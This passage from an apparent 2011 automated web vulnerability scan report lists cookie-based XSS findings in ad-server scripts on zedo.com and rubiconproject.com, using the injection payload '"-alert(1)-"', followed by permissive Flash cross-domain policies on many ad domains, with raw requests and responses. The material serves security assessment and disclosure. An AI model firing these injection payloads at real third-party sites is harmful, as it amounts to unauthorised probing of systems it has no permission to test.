Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~0903115d464"-alert(1)-"4bce18ebbfb; ZCBC=1; FFSkp=305,825,15,1:; FFMChanCap=2457780B305,825#722607|0,1#0,24; ZEDOIDX=13; FFMCap=2457900B1185,234056|0,1#0,24; FFcat=1185,589,14:305,825,15; FFad=0:0; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1185:aa378$767:8aac2;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,471,14:767,4,14:826,471,0:767,4,0:0,4,14:1185,589,14:305,825,15400f7829541bf3ff04cc1481;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=46:62:31:31:31:None:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "182787-8952-4aa4dd27613c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=153
Expires: Sun, 04 Sep 2011 02:36:55 GMT
Date: Sun, 04 Sep 2011 02:34:22 GMT
Content-Length: 5207
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='8aac2';va
...[SNIP]...
</iframe>');
}

       
var zzStr = "s=0;u=k5xiThcyanucBq9IXvhSGSz5~0903115d464"-alert(1)-"4bce18ebbfb;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

6.230. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [ZEDOIDA cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d8/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50541"-alert(1)-"59e80ebac42 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/d8/jsc/fm.js?c=589/122/121&a=0&f=&n=1185&r=13&d=14&q=&$=&s=76&z=0.1346084768883884 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~09031150541"-alert(1)-"59e80ebac42; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1185:aa378;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1185,589,14:1185,589,0:0,589,14:305,825,15400f7829e448bcadddbc6079;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=41:31:31:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "4368e0d-8952-4aa4dfbf231c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=121
Expires: Sun, 04 Sep 2011 02:34:38 GMT
Date: Sun, 04 Sep 2011 02:32:37 GMT
Content-Length: 4647
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=76;var zzPat='aa378';v
...[SNIP]...
anucBq9IXvhSGSz5~09031150541"-alert(1)-"59e80ebac42';

var zzhasAd=undefined;


                                                                           var zzStr = "s=76;u=k5xiThcyanucBq9IXvhSGSz5~09031150541"-alert(1)-"59e80ebac42;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

6.231. http://optimized-by.rubiconproject.com/a/4642/5271/7551-15.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4642/5271/7551-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edc9b"-alert(1)-"e848453bede was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/4642/5271/7551-15.js?cb=0.3750513994600624 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=edc9b"-alert(1)-"e848453bede; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=5032^2&9346^1; csi15=3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079; nus_2046=0.00; ses2=5032^2&9346^1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:38:38 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4642/5271; expires=Sun, 04-Sep-2011 03:38:38 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 04-Sep-2011 03:38:38 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=5032^2&9346^1b7abe1effcd6fc81c756a065&5271^84; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=105681; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 5206

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3216278"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=edc9b"-alert(1)-"e848453bede\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

7. Flash cross-domain policy  previous  next
There are 157 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


7.1. http://33across.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 33across.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:01:25 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 17:37:23 GMT
Accept-Ranges: bytes
Content-Length: 211
Cache-Control: max-age=1209600, proxy-revalidate
Expires: Sun, 18 Sep 2011 11:01:25 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...

7.2. http://a.collective-media.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.collective-media.net

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 04 Sep 2011 11:13:39 GMT
Content-Type: text/plain
Content-Length: 187
Last-Modified: Wed, 08 Sep 2010 17:14:24 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>

7.3. http://a.netmng.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.netmng.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:59:06 GMT
Server: Apache/2.2.9
Last-Modified: Mon, 13 Dec 2010 13:30:04 GMT
ETag: "c6204-6a-4974ab3a2af00"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.4. http://a.rfihub.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.rfihub.com

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/xml; charset=iso-8859-1
Content-Length: 199

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.5. http://a.tribalfusion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.6. http://a1.interclick.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a1.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 10 Aug 2011 14:57:15 GMT
Accept-Ranges: bytes
ETag: "df382cb6d57cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sun, 04 Sep 2011 10:59:18 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.7. http://ad-apac.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-apac.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad-apac.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Sun, 04 Sep 2011 04:04:44 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.8. http://ad.afy11.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 03:58:43 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.9. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Sun, 04 Sep 2011 04:05:51 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.10. http://ad.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 02:40:44 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 02:40:43 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

7.11. http://ad4.liverail.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad4.liverail.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: ad4.liverail.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/xml
Accept-Ranges: bytes
ETag: "1870415261"
Last-Modified: Thu, 01 Sep 2011 20:21:26 GMT
Content-Length: 269
Connection: close
Date: Sun, 04 Sep 2011 02:41:41 GMT
Server: lighttpd/1.4.28

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.12. http://adcontent.videoegg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adcontent.videoegg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adcontent.videoegg.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "af5f896ec6f317d2d7257811ce10f2f2:1218664361"
Last-Modified: Wed, 13 Aug 2008 21:52:41 GMT
Accept-Ranges: bytes
Content-Length: 202
Content-Type: application/xml
Cache-Control: max-age=1800
Expires: Sun, 04 Sep 2011 03:49:46 GMT
Date: Sun, 04 Sep 2011 03:19:46 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

7.13. http://admonkey.dapper.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admonkey.dapper.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admonkey.dapper.net

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sun, 04 Sep 2011 10:59:58 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Tue, 03 Aug 2010 09:20:10 GMT
ETag: "190400b-ca-48ce7d2dee680"
Accept-Ranges: bytes
Content-Length: 202
Vary: Accept-Encoding

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.14. http://ads.amgdgt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.amgdgt.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "85814f-12e-4871688bd9a00"
Cache-Control: max-age=21600
Expires: Sun, 04 Sep 2011 16:34:11 GMT
Content-Type: text/xml
Content-Length: 302
Date: Sun, 04 Sep 2011 11:00:20 GMT
X-Varnish: 511764955 511731691
Age: 1569
Via: 1.1 varnish
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

7.15. http://ads.undertone.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 29 Aug 2011 20:44:50 GMT
ETag: "52206e9-fc-4abaaf7619480"
Content-Type: text/xml
Date: Sun, 04 Sep 2011 10:59:45 GMT
Content-Length: 252
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.undertone.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.16. http://adserver.adtech.de/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC156E651A4418BD90FFF0106094

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

7.17. http://adserver.adtechus.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://core.videoegg.com/eap/14533/html/swf/AdManager.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

7.18. http://api.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Tue, 04 Oct 2011 03:08:03 GMT
X-FB-Server: 10.54.10.36
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

7.19. http://as.casalemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: as.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:27:27 GMT
ETag: "15690dc-e6-1230c1c0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Sun, 04 Sep 2011 02:37:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 02:37:33 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.20. http://avn.innity.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://avn.innity.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: avn.innity.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:12:30 GMT
Server: Apache
Last-Modified: Fri, 25 Apr 2008 12:09:18 GMT
ETag: "194c011-d6-44bb16f73d780"
Accept-Ranges: bytes
Content-Length: 214
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
</cross-
...[SNIP]...

7.21. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 05 Sep 2011 02:33:40 GMT
Date: Sun, 04 Sep 2011 02:33:40 GMT
Content-Length: 201
Connection: close
